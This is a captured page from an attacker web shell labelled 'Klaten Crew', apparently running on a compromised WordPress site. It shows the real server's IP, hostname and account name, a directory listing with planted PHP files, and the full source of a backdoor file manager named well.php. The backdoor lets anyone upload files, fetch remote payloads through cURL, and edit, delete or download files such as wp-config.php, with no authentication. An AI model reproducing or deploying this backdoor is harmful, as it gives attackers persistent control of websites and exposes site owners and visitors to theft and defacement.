HanJsXploit Klaten Crew
Linux r5.a1center.net 4.18.0-513.5.1.lve.el8.x86_64 #1 SMP Tue Nov 21 10:14:49 UTC 2023 x86_64
Apache
Server: 167.114.27.228
Your IP: 216.73.216.90
System Info
HOME
home
ipifapor
public_html
Command Execution
Execute
File Upload
Upload
New Folder
New File
Name
Type
Size
Permissions
Modified
Actions
..
Parent
-
drwxr-xr-x
2026-07-30 18:44:48
-
.tmb
Folder
-
0777
2026-07-24 20:42:11
.well-known
Folder
-
0755
2025-03-12 03:07:42
author
Folder
-
0755
2026-07-24 21:52:11
cgi-bin
Folder
-
0755
2024-05-20 23:48:36
contacto
Folder
-
0755
2026-07-24 21:50:56
directorio
Folder
-
0755
2026-07-24 21:42:35
doc
Folder
-
0755
2026-06-14 07:44:26
formacion
Folder
-
0755
2026-07-27 18:29:11
images
Folder
-
0755
2026-06-14 10:15:26
neftan
Folder
-
0755
2026-04-04 10:49:36
nosotros
Folder
-
0755
2026-07-24 21:47:28
organigrama
Folder
-
0755
2026-07-24 21:48:59
servicios
Folder
-
0755
2026-07-24 21:46:05
wp-admin
Folder
-
0755
2026-06-04 20:21:16
wp-content
Folder
-
0755
2026-07-30 18:43:08
wp-includes
Folder
-
0755
2026-07-17 19:28:51
.htaccess
File
812 B
0644
2026-07-24 10:05:59
add.php
File
13.68 KB
0644
2026-07-24 20:36:26
baner.jpg
File
164.45 KB
0644
2025-05-15 12:51:24
error_log
File
35.15 KB
0644
2026-07-30 01:25:09
google03cc0fa23fa7b025.html
File
53 B
0644
2026-07-24 20:44:50
index.php
File
405 B
0644
2020-02-06 11:33:12
license.txt
File
19.44 KB
0644
2026-01-01 05:07:30
material.pptx
File
1.24 MB
0644
2025-05-15 12:51:04
promayores
File
283.86 KB
0644
2026-06-14 07:36:20
readme.html
File
7.23 KB
0644
2026-07-17 19:28:51
well.php
File
7.21 KB
0644
2026-07-24 20:37:28
wp-activate.php
File
7.2 KB
0644
2026-02-17 22:05:44
wp-blog-header.php
File
510 B
0444
2026-07-27 18:29:15
wp-comments-post.php
File
2.27 KB
0644
2023-06-14 19:11:16
wp-config-sample.php
File
3.26 KB
0644
2025-08-12 19:47:32
wp-config.php
File
3.44 KB
0644
2025-03-07 15:08:27
wp-cron.php
File
5.49 KB
0644
2024-08-03 00:40:16
wp-links-opml.php
File
2.43 KB
0644
2025-04-30 17:52:30
wp-load.php
File
3.84 KB
0644
2024-03-11 15:05:16
wp-login.php
File
50.63 KB
0644
2026-03-01 03:57:46
wp-mail.php
File
8.52 KB
0644
2025-04-03 03:25:26
wp-settings.php
File
31.88 KB
0644
2026-05-08 20:59:44
wp-signup.php
File
33.81 KB
0644
2026-02-17 22:05:44
wp-trackback.php
File
5.09 KB
0644
2025-08-19 17:30:32
xmlrpc.php
File
3.13 KB
0644
2024-11-08 20:52:18
0
items selected
Choose Action...
Delete Selected
Zip Selected
Unzip Selected
Execute Action
Clear Selection
© Klaten Crew WebShell | Auto Bypass Enabled
Create New Folder
Create New File
Edit File: well.php
<?php session_start(); // ----[ Konfigurasi Awal ]---- $currentDir = realpath(isset($_GET['path']) ? $_GET['path'] : __DIR__); if (!is_dir($currentDir)) { die("Direktori tidak ditemukan."); } function deleteDir($dirPath) { if (!is_dir($dirPath)) return unlink($dirPath); foreach (scandir($dirPath) as $item) { if ($item === '.' || $item === '..') continue; deleteDir($dirPath . DIRECTORY_SEPARATOR . $item); } return rmdir($dirPath); } // ----[ Fitur Baru: Tambah Folder Baru ]---- if (isset($_POST['new_folder']) && !empty(trim($_POST['folder_name']))) { $newFolderPath = $currentDir . DIRECTORY_SEPARATOR . trim($_POST['folder_name']); if (!file_exists($newFolderPath)) { mkdir($newFolderPath, 0777, true); } header("Location: ?path=" . urlencode($currentDir)); exit; } // ----[ Fitur Baru: Tambah File Baru ]---- if (isset($_POST['new_file']) && !empty(trim($_POST['file_name']))) { $newFilePath = $currentDir . DIRECTORY_SEPARATOR . trim($_POST['file_name']); if (!file_exists($newFilePath)) { file_put_contents($newFilePath, ""); // Membuat file kosong terlebih dahulu } header("Location: ?path=" . urlencode($currentDir)); exit; } // ----[ Fitur Baru: Download via cURL ]---- if (isset($_POST['curl_download']) && !empty(trim($_POST['curl_url']))) { $url = trim($_POST['curl_url']); // Mengambil nama file dari URL $filename = basename(parse_url($url, PHP_URL_PATH)); if (empty($filename)) { $filename = 'downloaded_file_' . time() . '.txt'; // Nama default jika tidak ada nama file di URL } $savePath = $currentDir . DIRECTORY_SEPARATOR . $filename; // Inisialisasi cURL $ch = curl_init($url); $fp = fopen($savePath, 'wb'); curl_setopt($ch, CURLOPT_FILE, $fp); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); // Mengikuti redirect jika ada curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // Abaikan verifikasi SSL untuk kompatibilitas curl_exec($ch); curl_close($ch); fclose($fp); header("Location: ?path=" . urlencode($currentDir)); exit; } // Rename if (isset($_POST['rename'], $_POST['oldname'], $_POST['newname'])) { $old = $currentDir . DIRECTORY_SEPARATOR . $_POST['oldname']; $new = $currentDir . DIRECTORY_SEPARATOR . $_POST['newname']; if (file_exists($old)) rename($old, $new); } // Hapus if (isset($_GET['delete'])) { $target = realpath($currentDir . DIRECTORY_SEPARATOR . $_GET['delete']); if (strpos($target, $currentDir) === 0 || file_exists($target)) { deleteDir($target); } header("Location: ?path=" . urlencode($currentDir)); exit; } // Download if (isset($_GET['download'])) { $file = $currentDir . DIRECTORY_SEPARATOR . $_GET['download']; if (is_file($file)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($file) . '"'); header('Content-Length: ' . filesize($file)); readfile($file); exit; } } // View/Edit if (isset($_GET['view'])) { $file = $currentDir . DIRECTORY_SEPARATOR . $_GET['view']; if (is_file($file)) { if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['content'])) { file_put_contents($file, $_POST['content']); echo "<p>File disimpan.</p>"; } $content = htmlspecialchars(file_get_contents($file)); echo "<h3>Edit: ".basename($file)."</h3>"; echo "<form method='post'><textarea name='content' rows='20' cols='100'>{$content}</textarea><br><button type='submit'>Simpan</button></form>"; echo "<p><a href='?path=".urlencode($currentDir)."'>Kembali</a></p>"; exit; } } // Upload if (isset($_FILES['upload']) && $_FILES['upload']['error'] === UPLOAD_ERR_OK) { $tmpName = $_FILES['upload']['tmp_name']; $name = basename($_FILES['upload']['name']); move_uploaded_file($tmpName, $currentDir . DIRECTORY_SEPARATOR . $name); header("Location: ?path=" . urlencode($currentDir)); exit; } $items = scandir($currentDir); ?> <!DOCTYPE html> <html> <head> <title>File Manager</title> <style> body { font-family: sans-serif; padding: 20px; } table { border-collapse: collapse; width: 100%; margin-top: 10px; } td, th { padding: 8px; text-align: left; } .actions-wrapper { display: flex; gap: 20px; flex-wrap: wrap; background: #f4f4f4; padding: 15px; border-radius: 5px; } .form-inline { display: flex; gap: 5px; align-items: center; } input[type="text"], input[type="file"], input[type="url"] { padding: 5px; } button { padding: 5px 10px; cursor: pointer; } </style> </head> <body> <h2>File Manager</h2> <p>Path: <?= htmlspecialchars($currentDir) ?></p> <p><a href="?path=<?= urlencode(dirname($currentDir)) ?>">⬅️ Kembali</a></p> <div class="actions-wrapper"> <form method="post" enctype="multipart/form-data" class="form-inline"> <input type="file" name="upload" required> <button type="submit">Unggah File</button> </form> <form method="post" class="form-inline"> <input type="text" name="folder_name" placeholder="Nama Folder Baru" required> <button type="submit" name="new_folder">Buat Folder</button> </form> <form method="post" class="form-inline"> <input type="text" name="file_name" placeholder="Nama File Baru (ex: teks.txt)" required> <button type="submit" name="new_file">Buat File</button> </form> <form method="post" class="form-inline"> <input type="url" name="curl_url" placeholder="URL File (http://...)" required> <button type="submit" name="curl_download">Download via cURL</button> </form> </div> <br> <table border="1" cellpadding="5"> <tr><th>Nama</th><th>Aksi</th><th>Rename</th></tr> <?php foreach ($items as $item): if ($item === '.' || $item === '..') continue; $path = $currentDir . DIRECTORY_SEPARATOR . $item; $isDir = is_dir($path); ?> <tr> <td><?= $isDir ? "📁" : "📄" ?> <?= $isDir ? "<a href='?path=" . urlencode($path) . "'>$item</a>" : htmlspecialchars($item) ?></td> <td> <?php if (!$isDir): ?> <a href="?path=<?= urlencode($currentDir) ?>&download=<?= urlencode($item) ?>">Download</a> | <a href="?path=<?= urlencode($currentDir) ?>&view=<?= urlencode($item) ?>">View/Edit</a> | <?php endif; ?> <a href="?path=<?= urlencode($currentDir) ?>&delete=<?= urlencode($item) ?>" onclick="return confirm('Yakin hapus?')">Hapus</a> </td> <td> <form method="post" style="display:inline;"> <input type="hidden" name="oldname" value="<?= htmlspecialchars($item) ?>"> <input type="text" name="newname" value="<?= htmlspecialchars($item) ?>" required> <button type="submit" name="rename">Ubah</button> </form> </td> </tr> <?php endforeach; ?> </table> </body> </html>
Rename
Change Permissions
Common permissions: 755 (rwxr-xr-x), 644 (rw-r--r--), 777 (rwxrwxrwx)
System Information
Uname: Linux r5.a1center.net 4.18.0-513.5.1.lve.el8.x86_64 #1 SMP Tue Nov 21 10:14:49 UTC 2023 x86_64 Software: Apache PHP Version: 8.3.31 Protocol: HTTP/1.1 Server IP: 167.114.27.228 Your IP: 216.73.216.90 Mail: ON Curl: ON Owner: ipifapor MySQL: ON Disabled Functions: All functions are accessible Auto Bypass: ENABLED